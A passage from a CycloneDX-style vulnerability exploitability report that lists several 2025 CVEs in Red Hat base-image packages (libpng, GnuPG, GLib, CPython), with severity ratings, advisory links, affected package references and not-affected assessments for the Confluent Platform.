          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-30258",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 4.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 4.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 2.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:C/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        754
      ],
      "description": "In GnuPG before 2.5.5, if a user chooses to import a certificate with certain crafted subkey data that lacks a valid backsig or that has incorrect usage flags, the user loses the ability to verify signatures made from certain other signing keys, aka a \"verification DoS.\"",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-30258"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-30258"
        },
        {
          "url": "https://dev.gnupg.org/T7527"
        },
        {
          "url": "https://dev.gnupg.org/rG48978ccb4e20866472ef18436a32744350a65158"
        },
        {
          "url": "https://lists.gnupg.org/pipermail/gnupg-announce/2025q1/000491.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-30258"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7412-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7412-3"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-30258"
        }
      ],
      "published": "2025-03-19T20:15:20+00:00",
      "updated": "2026-06-17T09:08:24+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.3.3-5.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-3360",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        190
      ],
      "description": "A flaw was found in GLib. An integer overflow and buffer under-read occur when parsing a long invalid ISO 8601 timestamp with the g_date_time_new_from_iso8601() function.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-3360"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-3360"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2357754"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/3647"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/work_items/3647"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2025/04/msg00024.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-3360"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7942-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7942-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-3360"
        }
      ],
      "published": "2025-04-07T13:15:43+00:00",
      "updated": "2026-06-30T15:16:50+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.68.4-19.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-4516",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.1,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        416
      ],
      "description": "There is an issue in CPython when using `bytes.decode(\"unicode_escape\", error=\"ignore|replace\")`. If you are not using the \"unicode_escape\" encoding or an error handler your usage is not affected. To work-around this issue you may stop using the error= handler and instead wrap the bytes.decode() call in a try-except catching the DecodeError.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-4516"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2025/05/16/4"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2025/05/19/1"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2025:23530"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-4516"
        },
        {
          "url": "https://bugzilla.redhat.com/2294682"
        },
        {
          "url": "https://bugzilla.redhat.com/2321440"
        },
        {
          "url": "https://bugzilla.redhat.com/2325776"
        },
        {
          "url": "https://bugzilla.redhat.com/2343237"
        },
        {
          "url": "https://bugzilla.redhat.com/2366509"
        },
        {
          "url": "https://bugzilla.redhat.com/2370010"
        },
        {
          "url": "https://bugzilla.redhat.com/2370014"
        },
        {
          "url": "https://bugzilla.redhat.com/2370016"
        },
        {
          "url": "https://bugzilla.redhat.com/2372426"
        },
        {
          "url": "https://bugzilla.redhat.com/2373234"
        },
        {
          "url": "https://bugzilla.redhat.com/2402342"
        },
        {
          "url": "https://bugzilla.redhat.com/2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2294682"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2321440"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2325776"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2343237"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2366509"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2370010"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2370014"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2370016"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2372426"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2373234"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2402342"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2408891"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-11168"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5642"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-9287"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-0938"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4138"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4330"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4435"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4516"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4517"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-6069"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-6075"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-8291"
        },
        {
          "url": "https://errata.almalinux.org/8/ALSA-2025-23530.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2025:23530"
        },
        {
          "url": "https://github.com/python/cpython/commit/4398b788ffc1f954a2c552da285477d42a571292"
        },
        {
          "url": "https://github.com/python/cpython/commit/5646648678295a44aa82636c6e92826651baf33a"
        },
        {
          "url": "https://github.com/python/cpython/commit/6279eb8c076d89d3739a6edb393e43c7929b429d"
        },
        {
          "url": "https://github.com/python/cpython/commit/69b4387f78f413e8c47572a85b3478c47eba8142"
        },
        {
          "url": "https://github.com/python/cpython/commit/73b3040f592436385007918887b7e2132aa8431f"
        },
        {
          "url": "https://github.com/python/cpython/commit/8d35fd1b34935221aff23a1ab69a429dd156be77"
        },
        {
          "url": "https://github.com/python/cpython/commit/9f69a58623bd01349a18ba0c7a9cb1dad6a51e8e"
        },
        {
          "url": "https://github.com/python/cpython/commit/9f69a58623bd01349a18ba0c7a9cb1dad6a51e8e%20%28main%29"
        },
        {
          "url": "https://github.com/python/cpython/commit/ab9893c40609935e0d40a6d2a7307ea51aec598b"
        },
        {
          "url": "https://github.com/python/cpython/issues/133767"
        },
        {
          "url": "https://github.com/python/cpython/pull/129648"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2025-4516.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2025-23530.html"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/L75IPBBTSCYEF56I2M4KIW353BB3AY74/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-4516"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7570-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-4516"
        }
      ],
      "published": "2025-05-15T14:15:31+00:00",
      "updated": "2026-07-31T14:16:44+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-50181",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ghsa"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.1,
          "severity": "medium",
          "method": "CVSSv31",
